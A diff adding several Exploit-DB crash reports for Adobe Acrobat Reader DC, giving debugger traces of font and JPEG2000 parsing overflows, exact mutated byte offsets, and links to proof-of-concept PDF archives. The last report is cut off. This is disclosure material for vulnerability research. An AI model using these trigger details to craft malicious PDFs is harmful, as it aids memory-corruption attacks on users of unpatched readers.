+- The crash is caused by a heap-based buffer overflow and occurs immediately after opening the PDF document (poc1.pdf), or with a bit of interaction (scrolling to other pages, zooming in and out) for poc2.pdf and poc3.pdf.
+
+- We classify the bug as a potential RCE.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47272.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47273.txt b/exploits/windows/dos/47273.txt
new file mode 100644
index 000000000..7eb2bfdd3
--- /dev/null
+++ b/exploits/windows/dos/47273.txt
@@ -0,0 +1,73 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(188c.47fc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=10868d40 ebx=00001acb ecx=00001aca edx=1086cd54 esi=1086d4d8 edi=1086cd20
+eip=1065d2a0 esp=19d5db40 ebp=19d5db70 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+CoolType!CTCleanup+0x22e92:
+1065d2a0 89048e          mov     dword ptr [esi+ecx*4],eax ds:002b:10874000=00000000
+
+0:023> !address esi
+
+[...]
+Usage:                  Image
+Base Address:           10867000
+End Address:            10874000
+Region Size:            0000d000 (  52.000 kB)
+State:                  00001000          MEM_COMMIT
+Protect:                00000004          PAGE_READWRITE
+Type:                   01000000          MEM_IMAGE
+Allocation Base:        105c0000
+Allocation Protect:     00000080          PAGE_EXECUTE_WRITECOPY
+Image Path:             C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\CoolType.dll
+Module Name:            CoolType
+Loaded Image Name:      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\CoolType.dll
+Mapped Image Name:      
+More info:              lmv m CoolType
+More info:              !lmi CoolType
+More info:              ln 0x1086d4d8
+More info:              !dh 0x105c0000
+
+0:023> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 19d5db70 1065d214 1086cd20 1086d4d8 00000f5c CoolType!CTCleanup+0x22e92
+01 19d5dbac 1065dabd 1086d4a0 0000000e 1086d4d8 CoolType!CTCleanup+0x22e06
+02 19d5dbec 10668219 18187fb8 1086cca0 10868e60 CoolType!CTCleanup+0x236af
+03 19d5dc20 10608e68 18187bb8 19d5e69c 00000f5c CoolType!CTCleanup+0x2de0b
+04 19d5e344 10604051 18187bb8 19d5e5d4 19d5e754 CoolType!CTInit+0x460e1
+05 19d5e428 1063e7bb 18187bb8 19d5e5d4 19d5e754 CoolType!CTInit+0x412ca
+06 19d5e580 1063e47f 18187bb8 19d5e754 19d5e724 CoolType!CTCleanup+0x43ad
+07 19d5e5fc 106169cd 18187bb8 108700a0 19d5e754 CoolType!CTCleanup+0x4071
+08 19d5e7c4 1061619f 19d5e9b4 00000000 10870350 CoolType!CTInit+0x53c46
+09 19d5e894 10615091 00000000 00000001 00000001 CoolType!CTInit+0x53418
+0a 19d5ec5c 10614728 0000000c 16589e94 0000e94c CoolType!CTInit+0x5230a
+0b 19d5ec9c 10613751 16589de8 0000000b 19d5ed2c CoolType!CTInit+0x519a1
+0c 19d5ee08 106132e4 19d5f220 19d5f59c 0000044a CoolType!CTInit+0x509ca
+0d 19d5ee5c 64552182 165486c4 19d5f220 19d5f59c CoolType!CTInit+0x5055d
+0e 19d5f1a4 64550fc8 207ecb1c 19d5f220 19d5f59c AGM!AGMInitialize+0x69352
+0f 19d5f304 6451bcd0 19d5f36c 207ecab8 19d5f634 AGM!AGMInitialize+0x68198
+10 19d5f3a0 64523f0a 19d5f584 207ecab8 19d5f634 AGM!AGMInitialize+0x32ea0
+11 19d5f5cc 64522370 1730d0d0 14293a90 207ecab8 AGM!AGMInitialize+0x3b0da
+12 19d5f7a8 64520dec 1730d0d0 14293a90 e0be67fc AGM!AGMInitialize+0x39540
+13 19d5f7f4 6454ffbf 1730d0d0 14293a90 207b2388 AGM!AGMInitialize+0x37fbc
+14 19d5f818 6454fa3e 00000004 6454fb7f 14293a90 AGM!AGMInitialize+0x6718f
+15 00000000 00000000 00000000 00000000 00000000 AGM!AGMInitialize+0x66c0e
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled.
+
+- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of a static buffer in the CoolType.dll library.
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to two bytes at offset 0x123bff, changed from the original values of 0xC0 0x95 to 0xFF 0x7F. These bytes reside inside of a CFF font stream.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47273.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47274.txt b/exploits/windows/dos/47274.txt
new file mode 100644
index 000000000..bcd42eeb4
--- /dev/null
+++ b/exploits/windows/dos/47274.txt
@@ -0,0 +1,94 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(50a8.4100): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=ff3a0000 ebx=00003f11 ecx=00002000 edx=00000001 esi=0077bdfc edi=8c9e5000
+eip=64b40fb5 esp=0077bdc0 ebp=0077be18 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+CoolType!CTCleanup+0x26ba7:
+64b40fb5 894704          mov     dword ptr [edi+4],eax ds:002b:8c9e5004=????????
+
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 0077be18 64b05405 64d48440 8605cdcc 00000001 CoolType!CTCleanup+0x26ba7
+01 0077be34 64b04548 64d48284 27618cb0 0077c5e8 CoolType!CTInit+0x6267e
+02 0077be44 64b10fa7 0077be94 64d50130 0077be88 CoolType!CTInit+0x617c1
+03 0077c5e8 64b107bf 8605cdcc 0077c60c 0077c6a8 CoolType!CTInit+0x6e220
+04 0077c6a0 64b10736 8d3a8ff8 0077c6ec 8c3ccfa8 CoolType!CTInit+0x6da38
+05 0077c6b4 64b106c3 8605cd70 0077c6ec 8c3ccfa8 CoolType!CTInit+0x6d9af
+06 0077c6c8 64b1051c 8605cd70 0077c6ec 8c3ccfa8 CoolType!CTInit+0x6d93c
+07 0077c70c 64b10398 0077c7ec 5f8bc1ec 0077c7b0 CoolType!CTInit+0x6d795
+08 0077c738 64b1032b 0077c7ec 5f8bc1b4 0077c7b0 CoolType!CTInit+0x6d611
+09 0077c760 64b10208 8c3c8ff0 0077c7ec 5f8bc144 CoolType!CTInit+0x6d5a4
+0a 0077c790 64adb3c0 8c3c8ff0 0077c7ec 5f8bcf58 CoolType!CTInit+0x6d481
+0b 0077c98c 64ac036d 8605cd70 0077c9c4 5f8bcf3c CoolType!CTInit+0x38639
+0c 0077c9e8 64ac1c20 64d31918 00000001 00000000 CoolType!CTInit+0x1d5e6
+0d 0077ca18 64ac5eff 8605cd70 64d31918 00000001 CoolType!CTInit+0x1ee99
+0e 0077ca54 64ac036d 8605cd70 0077ca8c 5f8bcc64 CoolType!CTInit+0x23178
+0f 0077cab0 64ac1c20 64d319d0 00000001 00000000 CoolType!CTInit+0x1d5e6
+10 0077cae0 64ac2229 8605cd70 64d319d0 00000001 CoolType!CTInit+0x1ee99
+11 0077cb14 64ac5c4d 64d319d0 92280fc8 00000004 CoolType!CTInit+0x1f4a2
+12 0077cb4c 64ac32ba 8ce40fc0 5f8bd684 0077d138 CoolType!CTInit+0x22ec6
+13 0077d050 64ac31b3 8605cd70 8ce40fc0 0077d0b0 CoolType!CTInit+0x20533
+14 0077d088 64ac2ef7 8605cd70 8ce40fc0 0077d0b0 CoolType!CTInit+0x2042c
+15 0077d0cc 64ac2d85 0077d1a0 00000000 8605cd00 CoolType!CTInit+0x20170
+16 0077d10c 64acdad7 0077d1a0 8ce40fc0 00000000 CoolType!CTInit+0x1fffe
+17 0077d168 64acd96f 0077d1a0 8ce40fc0 91bbb002 CoolType!CTInit+0x2ad50
+18 0077d1b8 123bf455 8cae2f08 64d32280 91bbb002 CoolType!CTInit+0x2abe8
+19 0077d1dc 123be4e2 91bbb002 00000007 00000000 AcroRd32!DllCanUnloadNow+0x176495
+1a 0077e544 123ba692 0077e690 8b972f68 00000004 AcroRd32!DllCanUnloadNow+0x175522
+1b 0077e72c 123ba2fe 0077e740 91b7ea98 00000000 AcroRd32!DllCanUnloadNow+0x1716d2
+1c 0077e780 123b655c 0077e810 8b972f68 00000000 AcroRd32!DllCanUnloadNow+0x17133e
+1d 0077e838 123a93ed b7e1e317 78d62f78 00000000 AcroRd32!DllCanUnloadNow+0x16d59c
+1e 0077e918 123a81e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
+1f 0077e964 1239b383 78d62f78 00000000 00000000 AcroRd32!DllCanUnloadNow+0x15f228
+20 0077ead8 1239ac97 9096fdbc 00000001 870c2ef8 AcroRd32!DllCanUnloadNow+0x1523c3
+21 0077eb40 12398590 b7e1e1cf 96476e74 870c2ef8 AcroRd32!DllCanUnloadNow+0x151cd7
+22 0077ebc0 1239825a 870c2ef8 8de26f40 96476e44 AcroRd32!DllCanUnloadNow+0x14f5d0
+23 0077ebfc 12416099 870c2ef8 8de26f40 96476e44 AcroRd32!DllCanUnloadNow+0x14f29a
+24 0077ecd4 124157f9 8ae88fc8 00000000 8de26f40 AcroRd32!CTJPEGDecoderRelease+0x2b209
+25 0077ed14 12415717 8ae88fc8 00000000 8de26f40 AcroRd32!CTJPEGDecoderRelease+0x2a969
+26 0077ed4c 12415669 00000000 8de26f40 0077eecc AcroRd32!CTJPEGDecoderRelease+0x2a887
+27 0077ed68 124151ec 8de26f40 0077eecc 0077eee4 AcroRd32!CTJPEGDecoderRelease+0x2a7d9
+28 0077ef30 12414a8c 00000009 00000000 ffffffff AcroRd32!CTJPEGDecoderRelease+0x2a35c
+29 0077f150 124147d4 124147a0 8991cf90 0077f1a8 AcroRd32!CTJPEGDecoderRelease+0x29bfc
+2a 0077f160 1226ed79 8d2061b8 b7e1fba7 8b612ff8 AcroRd32!CTJPEGDecoderRelease+0x29944
+2b 0077f1a8 1226e83d 00000744 b7e1f817 15861fd8 AcroRd32!DllCanUnloadNow+0x25db9
+2c 0077f218 1226e5d4 b7e1f84f 15861fd8 1226e560 AcroRd32!DllCanUnloadNow+0x2587d
+2d 0077f240 12204709 000004d3 00000000 12204270 AcroRd32!DllCanUnloadNow+0x25614
+2e 0077f25c 7460e0bb 00bc0f52 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0x8909
+2f 0077f288 74618849 12204270 00bc0f52 00000113 USER32!_InternalCallWinProc+0x2b
+30 0077f2ac 7461b145 00000113 000004d3 00000000 USER32!InternalCallWinProc+0x20
+31 0077f37c 746090dc 12204270 00000000 00000113 USER32!UserCallWinProcCheckWow+0x1be
+32 0077f3e8 74608c20 1a382cee 0077f40c 1226da8b USER32!DispatchMessageWorker+0x4ac
+33 0077f3f4 1226da8b 0077f428 1583ddd8 1583ddd8 USER32!DispatchMessageW+0x10
+34 0077f40c 1226d81e 0077f428 b7e1fe8f 1583ddd8 AcroRd32!DllCanUnloadNow+0x24acb
+35 0077f480 1226d6b4 b7e1feb7 1583ddd8 00000000 AcroRd32!DllCanUnloadNow+0x2485e
+36 0077f4b8 121fc556 b7e1ff27 1458cff8 00000000 AcroRd32!DllCanUnloadNow+0x246f4
+37 0077f528 121fbf81 121d0000 00af0000 1458cff8 AcroRd32!AcroWinMainSandbox+0x756
+38 0077f948 00af783d 121d0000 00af0000 1458cff8 AcroRd32!AcroWinMainSandbox+0x181
+39 0077fd14 00bffd2a 00af0000 00000000 0b6db3ba AcroRd32_exe+0x783d
+3a 0077fd60 73cf8674 0041d000 73cf8650 be42f918 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
+3b 0077fd74 77285e17 0041d000 11e63d34 00000000 KERNEL32!BaseThreadInitThunk+0x24
+3c 0077fdbc 77285de7 ffffffff 772aadae 00000000 ntdll!__RtlUserThreadStart+0x2f
+3d 0077fdcc 00000000 00af1390 0041d000 00000000 ntdll!_RtlUserThreadStart+0x1b
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more consistently with PageHeap, though).
+
+- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of an allocated buffer.
+
+- It seems to be an off-by-one error, leading to an 8-byte overflow.
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to two bytes at offsets 0x3f523 and 0x40123 (0x65 => 0x75 and 0x15 => 0x05). These bytes reside inside of a Type 1 font stream.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47274.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47275.txt b/exploits/windows/dos/47275.txt
new file mode 100644
index 000000000..3c205b8c4
--- /dev/null
+++ b/exploits/windows/dos/47275.txt
@@ -0,0 +1,104 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(3fb8.2ac4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=02c50000 ebx=57694ff0 ecx=00000004 edx=00111111 esi=57695010 edi=0000001b
+eip=13b51c4e esp=668dd318 ebp=668dd378 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+CoolType!CTInit+0x6eec7:
+13b51c4e 8906            mov     dword ptr [esi],eax  ds:002b:57695010=????????
+
+0:018> !heap -p -a @esi-20
+    address 57694ff0 found in
+    _DPH_HEAP_ROOT @ 8e1000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                                53ab2af8:         57694e40              1c0 -         57694000             2000
+    66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
+    77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
+    7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
+    7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
+    7725ccee ntdll!RtlAllocateHeap+0x0000003e
+    66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
+    74a2f1f6 ucrtbase!_malloc_base+0x00000026
+    11e5fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
+    13ae74d4 CoolType!CTInit+0x0000474d
+    13b50e2c CoolType!CTInit+0x0006e0a5
+    13b507bf CoolType!CTInit+0x0006da38
+    13b50736 CoolType!CTInit+0x0006d9af
+    13b506c3 CoolType!CTInit+0x0006d93c
+    13b5051c CoolType!CTInit+0x0006d795
+    13b50398 CoolType!CTInit+0x0006d611
+    13b5032b CoolType!CTInit+0x0006d5a4
+    13b50208 CoolType!CTInit+0x0006d481
+    13b1b3c0 CoolType!CTInit+0x00038639
+    13b0036d CoolType!CTInit+0x0001d5e6
+    13b01c20 CoolType!CTInit+0x0001ee99
+    13b05eff CoolType!CTInit+0x00023178
+    13b0036d CoolType!CTInit+0x0001d5e6
+    13b01c20 CoolType!CTInit+0x0001ee99
+    13b02229 CoolType!CTInit+0x0001f4a2
+    13b05c4d CoolType!CTInit+0x00022ec6
+    13b032ba CoolType!CTInit+0x00020533
+    13b031b3 CoolType!CTInit+0x0002042c
+    13b02ef7 CoolType!CTInit+0x00020170
+    13b02d85 CoolType!CTInit+0x0001fffe
+    13b0dad7 CoolType!CTInit+0x0002ad50
+    13b0d96f CoolType!CTInit+0x0002abe8
+    1201f455 AcroRd32!DllCanUnloadNow+0x00176495
+
+0:018> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 668dd378 13b45405 13d88404 56842dcc 00000001 CoolType!CTInit+0x6eec7
+01 668dd394 13b44548 13d88284 275aacb0 668ddb48 CoolType!CTInit+0x6267e
+02 668dd3a4 13b50fa7 668dd3f4 13d90130 668dd3e8 CoolType!CTInit+0x617c1
+03 668ddb48 13b507bf 56842dcc 668ddb6c 668ddc08 CoolType!CTInit+0x6e220
+04 668ddc00 13b50736 43730ff8 668ddc4c 69db2fa8 CoolType!CTInit+0x6da38
+05 668ddc14 13b506c3 56842d70 668ddc4c 69db2fa8 CoolType!CTInit+0x6d9af
+06 668ddc28 13b5051c 56842d70 668ddc4c 69db2fa8 CoolType!CTInit+0x6d93c
+07 668ddc6c 13b50398 668ddd4c cbb06bb8 668ddd10 CoolType!CTInit+0x6d795
+08 668ddc98 13b5032b 668ddd4c cbb06be0 668ddd10 CoolType!CTInit+0x6d611
+09 668ddcc0 13b50208 631bcff0 668ddd4c cbb06bd0 CoolType!CTInit+0x6d5a4
+0a 668ddcf0 13b1b3c0 631bcff0 668ddd4c cbb069cc CoolType!CTInit+0x6d481
+0b 668ddeec 13b0036d 56842d70 668ddf24 cbb06868 CoolType!CTInit+0x38639
+0c 668ddf48 13b01c20 13d71918 00000001 00000000 CoolType!CTInit+0x1d5e6
+0d 668ddf78 13b05eff 56842d70 13d71918 00000001 CoolType!CTInit+0x1ee99
+0e 668ddfb4 13b0036d 56842d70 668ddfec cbb05730 CoolType!CTInit+0x23178
+0f 668de010 13b01c20 13d719d0 00000001 00000000 CoolType!CTInit+0x1d5e6
+10 668de040 13b02229 56842d70 13d719d0 00000001 CoolType!CTInit+0x1ee99
+11 668de074 13b05c4d 13d719d0 58fb2fc8 00000004 CoolType!CTInit+0x1f4a2
+12 668de0ac 13b032ba 27594fc0 cbb05290 668de698 CoolType!CTInit+0x22ec6
+13 668de5b0 13b031b3 56842d70 27594fc0 668de610 CoolType!CTInit+0x20533
+14 668de5e8 13b02ef7 56842d70 27594fc0 668de610 CoolType!CTInit+0x2042c
+15 668de62c 13b02d85 668de700 00000000 56842d00 CoolType!CTInit+0x20170
+16 668de66c 13b0dad7 668de700 27594fc0 00000000 CoolType!CTInit+0x1fffe
+17 668de6c8 13b0d96f 668de700 27594fc0 6e865226 CoolType!CTInit+0x2ad50
+18 668de718 1201f455 670f0f08 13d72280 6e865226 CoolType!CTInit+0x2abe8
+19 668de73c 1201e4e2 6e865226 00000001 00000000 AcroRd32!DllCanUnloadNow+0x176495
+1a 668dfaa4 1201a692 668dfbf0 57586f68 00000005 AcroRd32!DllCanUnloadNow+0x175522
+1b 668dfc8c 1201a2fe 668dfca0 5e3fea98 00000000 AcroRd32!DllCanUnloadNow+0x1716d2
+1c 668dfce0 1201655c 668dfd70 57586f68 00000000 AcroRd32!DllCanUnloadNow+0x17133e
+1d 668dfd98 120093ed 20425f7b 00000000 5e3fea98 AcroRd32!DllCanUnloadNow+0x16d59c
+1e 668dfe78 12032848 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
+1f 668dfed0 12032647 00000000 00000000 120320d0 AcroRd32!DllCanUnloadNow+0x189888
+20 668dff3c 12031fec 20425e67 12031540 5f050ff8 AcroRd32!DllCanUnloadNow+0x189687
+21 668dff64 12031551 15777c58 12031540 668dff88 AcroRd32!DllCanUnloadNow+0x18902c
+22 668dff74 73cf8674 5f050ff8 73cf8650 4348ebff AcroRd32!DllCanUnloadNow+0x188591
+23 668dff88 77285e17 5f050ff8 c74bea74 00000000 KERNEL32!BaseThreadInitThunk+0x24
+24 668dffd0 77285de7 ffffffff 772aad8d 00000000 ntdll!__RtlUserThreadStart+0x2f
+25 668dffe0 00000000 12031540 5f050ff8 00000000 ntdll!_RtlUserThreadStart+0x1b
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
+
+- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data outside of an allocated buffer.
+
+- Attached samples: poc1.pdf and poc2.pdf (crashing files), original.pdf (original file). We haven't been able to minimize the testcases as the PoC files are significantly mutated beyond simple bit flips.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47275.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47276.txt b/exploits/windows/dos/47276.txt
new file mode 100644
index 000000000..1b1768363
--- /dev/null
+++ b/exploits/windows/dos/47276.txt
@@ -0,0 +1,91 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(4c84.1e3c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=13842768 ebx=14b6d730 ecx=1383e108 edx=13832820 esi=13832850 edi=14b6d92c
+eip=1062a82e esp=1383def0 ebp=1383def8 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+CoolType!CTInit+0x37aa7:
+1062a82e 8902            mov     dword ptr [edx],eax  ds:002b:13832820=????????
+
+0:022> u @eip-14
+CoolType!CTInit+0x37a93:
+1062a81a 8b7d0c          mov     edi,dword ptr [ebp+0Ch]
+1062a81d 8b571c          mov     edx,dword ptr [edi+1Ch]
+1062a820 8b7720          mov     esi,dword ptr [edi+20h]
+1062a823 035508          add     edx,dword ptr [ebp+8]
+1062a826 8b4724          mov     eax,dword ptr [edi+24h]
+1062a829 037508          add     esi,dword ptr [ebp+8]
+1062a82c 03c6            add     eax,esi
+1062a82e 8902            mov     dword ptr [edx],eax
+
+0:022> ? poi(edi+1c)
+Evaluate expression: -56136 = ffff24b8
+
+0:022> ? poi(ebp+8)
+Evaluate expression: 327418728 = 13840368
+
+0:022> !heap -p -a 13840368
+    address 13840368 found in
+    _DPH_HEAP_ROOT @ bd61000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                                 bd639c0:         13840368           190c94 -         13840000           192000
+          unknown!fillpattern
+    66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
+    77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
+    7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
+    7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
+    7725ccee ntdll!RtlAllocateHeap+0x0000003e
+    66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
+    74a2f1f6 ucrtbase!_malloc_base+0x00000026
+    0e96fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
+    105f74d4 CoolType!CTInit+0x0000474d
+    105f8888 CoolType!CTInit+0x00005b01
+    106270cf CoolType!CTInit+0x00034348
+    10626c61 CoolType!CTInit+0x00033eda
+    106265a2 CoolType!CTInit+0x0003381b
+    10623c6f CoolType!CTInit+0x00030ee8
+    10621d55 CoolType!CTInit+0x0002efce
+    106210e9 CoolType!CTInit+0x0002e362
+    1062096c CoolType!CTInit+0x0002dbe5
+    10620893 CoolType!CTInit+0x0002db0c
+    645138e1 AGM!AGMInitialize+0x0002aab1
+
+ 
+0:022> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 1383def8 1062a372 13840368 14b6d92c 13840368 CoolType!CTInit+0x37aa7
+01 1383df6c 1062a296 1383e104 1383e034 00000001 CoolType!CTInit+0x375eb
+02 1383df84 1062a277 1383e104 1383e034 16977160 CoolType!CTInit+0x3750f
+03 1383df98 10629d00 1383e104 1383e034 16977160 CoolType!CTInit+0x374f0
+04 1383dfb8 10629a71 1383e328 16977160 00000000 CoolType!CTInit+0x36f79
+05 1383e158 10628ea7 16977160 108a00a0 1383e328 CoolType!CTInit+0x36cea
+06 1383e3b4 10623e89 1383e6a8 1383e430 00000000 CoolType!CTInit+0x36120
+07 1383e6d0 10621d55 00000001 00000000 00000000 CoolType!CTInit+0x31102
+08 1383e7a0 106210e9 16d43ec0 00000009 1383e834 CoolType!CTInit+0x2efce
+09 1383efb8 1062096c 188f40ec 1383efd0 188f40c8 CoolType!CTInit+0x2e362
+0a 1383f038 10620893 188f40ec 188f40d4 393d9f99 CoolType!CTInit+0x2dbe5
+0b 1383f070 645138e1 14c73e6c 188f40ec 10882280 CoolType!CTInit+0x2db0c
+0c 1383f084 644ffb1e 188f40d4 644ffab0 1737c5f0 AGM!AGMInitialize+0x2aab1
+0d 1383f098 644fe8e7 1737c5fc 649a09f8 00000001 AGM!AGMInitialize+0x16cee
+0e 1383f0d0 6451041c 30146add 13db5c78 00000000 AGM!AGMInitialize+0x15ab7
+0f 1383f17c 772fcd28 0ad60000 1383f1b0 66d6922c AGM!AGMInitialize+0x275ec
+10 1383f190 00000000 66d69238 772fcd10 0ad64d80 ntdll!RtlReleaseStackTrace+0x18
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled (more cleanly with PageHeap, though).
+
+- The crash occurs immediately after opening the PDF document, and is caused by an attempt to write data at a negative offset relative to a heap allocation (-56136 in the above case).
+
+- Attached samples: poc.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to three bytes at offsets 0x2bd4c, 0x2bd4d and 0x2d5b8 (0x00 => 0xff in all cases). These bytes reside inside of a TrueType font stream.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47276.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47277.txt b/exploits/windows/dos/47277.txt
new file mode 100644
index 000000000..b0ec4ee51
--- /dev/null
+++ b/exploits/windows/dos/47277.txt
@@ -0,0 +1,135 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(2728.1fa8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=fffd6880 ebx=1738cc84 ecx=0000078c edx=00000045 esi=14cf3f68 edi=1b884158
+eip=6445cee9 esp=050fcab0 ebp=050fcac0 iopl=0         nv up ei ng nz na po cy
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210283
+JP2KLib!JP2KCopyRect+0x17ce9:
+6445cee9 c6040100        mov     byte ptr [ecx+eax],0       ds:002b:fffd700c=??
+
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 050fcac0 6445cfea 1b884158 14cf3f68 1738cc84 JP2KLib!JP2KCopyRect+0x17ce9
+01 050fcb24 6445b4ff 00000005 94f99e7b 00000003 JP2KLib!JP2KCopyRect+0x17dea
+02 050fcb90 6445898e 00000005 94f998ff 00000000 JP2KLib!JP2KCopyRect+0x162ff
+03 050fcd14 6444d2af 143ca8a0 ffffffff 00000005 JP2KLib!JP2KCopyRect+0x1378e
+04 050fcd88 6444d956 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x80af
+05 050fcdec 6444dc90 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x8756
+06 050fce10 64465e4a 00000000 00000005 00000008 JP2KLib!JP2KCopyRect+0x8a90
+07 050fce70 0f07e12e 1738cc00 00000000 00000005 JP2KLib!JP2KImageDecodeTileInterleaved+0x2a
+08 050fcefc 0f04701b 00000000 050fcfa8 050fcfbc AcroRd32!AX_PDXlateToHostEx+0x3200de
+09 050fcff4 0ef5ae8d 050fd014 050fd024 013e3626 AcroRd32!AX_PDXlateToHostEx+0x2e8fcb
+0a 050fd038 645ada8c 16881638 050fd0a4 d6cb512b AcroRd32!AX_PDXlateToHostEx+0x1fce3d
+0b 050fd0b4 645ae053 050fd100 d6cb5173 00000000 AGM!AGMGetVersion+0x16e3c
+0c 050fd0ec 6484fb4c 189c6b24 050fd100 fffffffd AGM!AGMGetVersion+0x17403
+0d 050fd104 64529a32 050fd198 d6cb5457 17432d88 AGM!AGMGetVersion+0x2b8efc
+0e 050fd5c8 645275d6 050fdad8 17432d88 050fda4c AGM!AGMInitialize+0x40c02
+0f 050fda6c 64524133 050fdad8 17432d88 050fdc6c AGM!AGMInitialize+0x3e7a6
+10 050fdc8c 64522370 174201d0 14a51c28 1741d3b8 AGM!AGMInitialize+0x3b303
+11 050fde68 64520dec 174201d0 14a51c28 d6cb5f2b AGM!AGMInitialize+0x39540
+12 050fdeb4 6454ffbf 174201d0 14a51c28 172b6718 AGM!AGMInitialize+0x37fbc
+13 050fded8 6454fa3e 00000201 6454fb7f 14a51c28 AGM!AGMInitialize+0x6718f
+14 050fdee0 6454fb7f 14a51c28 d6cb5ed3 172b6718 AGM!AGMInitialize+0x66c0e
+15 050fdf1c 644f8c6b 050fdff0 00000000 ffffffff AGM!AGMInitialize+0x66d4f
+16 050fdf70 0ebccc6c 050fdfac 0ebccc73 013e3982 AGM!AGMInitialize+0xfe3b
+17 050fdf78 0ebccc73 013e3982 172b6718 050fdf58 AcroRd32!DllCanUnloadNow+0x183cac
+18 050fdfb4 0ebda604 16625154 013e0602 16625128 AcroRd32!DllCanUnloadNow+0x183cb3
+19 050fdfe8 0ebda037 18cc864c 102872cc 0ebda4d2 AcroRd32!DllCanUnloadNow+0x191644
+1a 050fdff4 0ebda4d2 013e0602 16625128 00000001 AcroRd32!DllCanUnloadNow+0x191077
+1b 050fe01c 0ebed46a 013e067e 00000000 16625128 AcroRd32!DllCanUnloadNow+0x191512
+1c 050fe060 0ebd9b8e 013e06b2 14ed7a00 16625128 AcroRd32!CTJPEGDecoderRelease+0x25da
